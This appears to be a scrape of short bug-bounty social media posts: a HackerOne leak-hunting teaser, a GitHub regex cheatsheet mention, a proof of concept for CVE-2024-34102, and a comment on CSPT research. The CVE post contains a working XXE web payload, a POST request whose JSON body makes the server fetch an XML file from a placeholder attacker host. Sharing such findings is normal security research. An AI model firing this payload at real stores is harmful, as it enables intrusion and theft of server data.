Reported 20+ Sensitive Leaks on H1 in the last 3 months! Here's how I found them and how you can too👇 #BugBounty #bugbountytips #bugbountytip

Github RegEx Search for Hunting (Cheatsheet) I'll describe it all in the comment section...

CVE-2024-34102 POC POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2 {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}

CSPT is my favorite vuln type - and I yap about it on Critical Thinking - Bug Bounty Podcast all the time. I've been reporting CSPTs for the past 2 years+ now, so in light of the new research dropped by Doyensec, let me drop a couple of takes on this🔥research: